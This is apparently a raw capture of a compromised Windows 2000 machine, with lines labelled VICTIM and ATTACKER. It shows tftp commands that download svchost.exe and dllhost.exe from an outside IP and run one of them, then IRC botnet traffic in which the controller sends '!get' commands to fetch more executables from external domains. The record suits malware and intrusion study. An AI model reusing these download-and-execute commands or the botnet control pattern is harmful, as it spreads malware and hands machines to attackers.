VICTIM: Microsoft Windows 2000 [Version 5.00.2195]
VICTIM: (C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32>
VICTIM: tftp -i 110.12.70.244 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000\t
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: Transfer successful: 29456 bytes in 14 seconds, 2104 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: tftp -i 110.12.70.244 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: \000\004\000;
VICTIM: \000\004\000<
VICTIM: \000\004\000=
VICTIM: \000\004\000>
VICTIM: \000\004\000?
VICTIM: \000\004\000@
VICTIM: \000\004\000A
VICTIM: \000\004\000B
VICTIM: \000\004\000C
VICTIM: \000\004\000D
VICTIM: \000\004\000E
VICTIM: \000\004\000F
VICTIM: \000\004\000G
VICTIM: \000\004\000H
VICTIM: \000\004\000I
VICTIM: \000\004\000J
VICTIM: \000\004\000K
VICTIM: \000\004\000L
VICTIM: \000\004\000M
VICTIM: \000\004\000N
VICTIM: \000\004\000O
VICTIM: \000\004\000P
VICTIM: \000\004\000Q
VICTIM: \000\004\000R
VICTIM: \000\004\000S
VICTIM: \000\004\000T
VICTIM: \000\004\000U
VICTIM: \000\004\000V
VICTIM: \000\004\000W
VICTIM: \000\004\000X
VICTIM: \000\004\000Y
VICTIM: \000\004\000Z
VICTIM: \000\004\000[
VICTIM: \000\004\000\\
VICTIM: \000\004\000]
VICTIM: \000\004\000^
VICTIM: \000\004\000_
VICTIM: \000\004\000`
VICTIM: \000\004\000a
VICTIM: \000\004\000b
VICTIM: \000\004\000c
VICTIM: \000\004\000d
VICTIM: \000\004\000e
VICTIM: \000\004\000f
VICTIM: \000\004\000g
VICTIM: \000\004\000h
VICTIM: \000\004\000i
VICTIM: \000\004\000j
VICTIM: \000\004\000k
VICTIM: \000\004\000l
VICTIM: \000\004\000m
VICTIM: \000\004\000n
VICTIM: \000\004\000o
VICTIM: \000\004\000p
VICTIM: \000\004\000q
VICTIM: \000\004\000r
VICTIM: \000\004\000s
VICTIM: \000\004\000t
VICTIM: \000\004\000u
VICTIM: \000\004\000v
VICTIM: \000\004\000w
VICTIM: \000\004\000x
VICTIM: \000\004\000y
VICTIM: \000\004\000z
VICTIM: \000\004\000{
VICTIM: \000\004\000|
VICTIM: \000\004\000}
VICTIM: \000\004\000~
VICTIM: \000\004\000\177
VICTIM: \000\004\000\200
VICTIM: \000\004\000\201
VICTIM: \000\004\000\202
VICTIM: \000\004\000\203
VICTIM: \000\004\000\204
VICTIM: \000\004\000\205
VICTIM: \000\004\000\206
VICTIM: \000\004\000\207
VICTIM: \000\004\000\210
VICTIM: \000\004\000\211
VICTIM: \000\004\000\212
VICTIM: \000\004\000\213
VICTIM: \000\004\000\214
VICTIM: \000\004\000\215
VICTIM: \000\004\000\216
VICTIM: \000\004\000\217
VICTIM: \000\004\000\220
VICTIM: \000\004\000\221
VICTIM: \000\004\000\222
VICTIM: \000\004\000\223
VICTIM: \000\004\000\224
VICTIM: \000\004\000\225
VICTIM: \000\004\000\226
VICTIM: \000\004\000\227
VICTIM: \000\004\000\230
VICTIM: \000\004\000\231
VICTIM: \000\004\000\232
VICTIM: \000\004\000\233
VICTIM: \000\004\000\234
VICTIM: \000\004\000\235
VICTIM: \000\004\000\236
VICTIM: \000\004\000\237
VICTIM: \000\004\000\240
VICTIM: \000\004\000\241
VICTIM: \000\004\000\242
VICTIM: \000\004\000\243
VICTIM: \000\004\000\244
VICTIM: \000\004\000\245
VICTIM: \000\004\000\246
VICTIM: \000\004\000\247
VICTIM: \000\004\000\250
VICTIM: \000\004\000\251
VICTIM: \000\004\000\252
VICTIM: \000\004\000\253
VICTIM: \000\004\000\254
VICTIM: \000\004\000\255
VICTIM: \000\004\000\256
VICTIM: \000\004\000\257
VICTIM: \000\004\000\260
VICTIM: \000\004\000\261
VICTIM: \000\004\000\262
VICTIM: \000\004\000\263
VICTIM: \000\004\000\264
VICTIM: \000\004\000\265
VICTIM: \000\004\000\266
VICTIM: \000\004\000\267
VICTIM: \000\004\000\270
VICTIM: \000\004\000\271
VICTIM: \000\004\000\272
VICTIM: \000\004\000\273
VICTIM: \000\004\000\274
VICTIM: \000\004\000\275
VICTIM: \000\004\000\276
VICTIM: \000\004\000\277
VICTIM: \000\004\000\300
VICTIM: \000\004\000\301
VICTIM: \000\004\000\302
VICTIM: \000\004\000\303
VICTIM: \000\004\000\304
VICTIM: \000\004\000\305
VICTIM: \000\004\000\306
VICTIM: \000\004\000\307
VICTIM: \000\004\000\310
VICTIM: \000\004\000\311
VICTIM: \000\004\000\312
VICTIM: \000\004\000\313
VICTIM: \000\004\000\314
VICTIM: \000\004\000\315
VICTIM: \000\004\000\316
VICTIM: \000\004\000\317
VICTIM: \000\004\000\320
VICTIM: \000\004\000\321
VICTIM: \000\004\000\322
VICTIM: \000\004\000\323
VICTIM: \000\004\000\324
VICTIM: \000\004\000\325
VICTIM: \000\004\000\326
VICTIM: \000\004\000\327
VICTIM: \000\004\000\330
VICTIM: \000\004\000\331
VICTIM: \000\004\000\332
VICTIM: \000\004\000\333
VICTIM: \000\004\000\334
VICTIM: Transfer successful: 112128 bytes in 47 seconds, 2385 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: NICK midwfvljUSER c020500 . . :-
VICTIM: Service Pack 2JOIN &virtu
ATTACKER: :u. PRIVMSG midwfvlj :!get http:/zhongmail.com:88/sbjb.txt:u. PRIVMSG midwfvlj :!get http:/tyui89.com/fth.txt:u. PRIVMSG midwfvlj :!get http:/tyui89.com/temp/fast.exe
ATTACKER: PING :i.
ATTACKER: PONG :i.
VICTIM: JOIN &virtu
ATTACKER: PING :i.
ATTACKER: PONG :i.
VICTIM: JOIN &virtu
VICTIM: \245Y\025\000\250ul\t\002\026\305<\R\374Y\241~\237\tyK#\221\361
VICTIM: \254Z(\000\001\\\365J9k\241\266\333\037\220\323\t\274\3475\231\307\277\026\031\227go\301\001\246v^wVTZ\311y \314IS
VICTIM: \300\240 \0009\244<\347\305\344\345\270\300\014x\2354\357y4\307\033S\253\232:\317\301\366\362#vyx\274W
VICTIM: \231{\026\000\201\257\227\240\234\270HXA\373(xQ15\215UR\326\323\355A
VICTIM: \221\031&\000\276Q\021a)H\216-\3043\221\037\213\346\365\316\316*\035\032\230\003\336\014\004\246\336\217K\257\372\261\300\327\234\256\306
VICTIM: \371\303\034\0002\276\357\272\366\230\273\\\216\270\0374\323\205\3256\277\276dX\345Ub\274\373\317\241'
VICTIM: \355\355\021\000g\352\2117\020\027\324\211\270h\373\310J\\`a%
VICTIM: \240P!\000,\217\240m\271\321\007\233\267|\232pc\2478\370\303\242P\301\326O\346f\213\014i\255\216]ObU
VICTIM: \355\355\021\000g\352\2117\020\027\324\211\270h\373\310J\\`a%
VICTIM: \215\035\023\000\231<,LI\261\270\252\032\037C\354z\273\025\254\304\006\313
VICTIM: \004\370\033\000\233\023\003\366\262Hu\236\206\226*ZE\213;\261\226\330\261\200\260\244\314\275\265\223\375
VICTIM: \231{\026\000\201\257\227\240\234\270HXA\373(xQ15\215UR\326\323\355A
VICTIM: \371\303\034\0002\276\357\272\366\230\273\\\216\270\0374\323\205\3256\277\276dX\345Ub\274\373\317\241'
VICTIM: \240P!\000,\217\240m\271\321\007\233\267|\232pc\2478\370\303\242P\301\326O\346f\213\014i\255\216]ObU
VICTIM: \\021%\000\357K9WD\343R\265\257?\352\333\013\254J1\331R\347\244\301\337\355!MKd\232Lc*\314\206\251\000e\025
VICTIM: *s\030\000<\021,:\326\235\005R\314uz5F}63\210\361QH\362\215\336\262
ATTACKER: PONG :i.
VICTIM: JOIN &virtu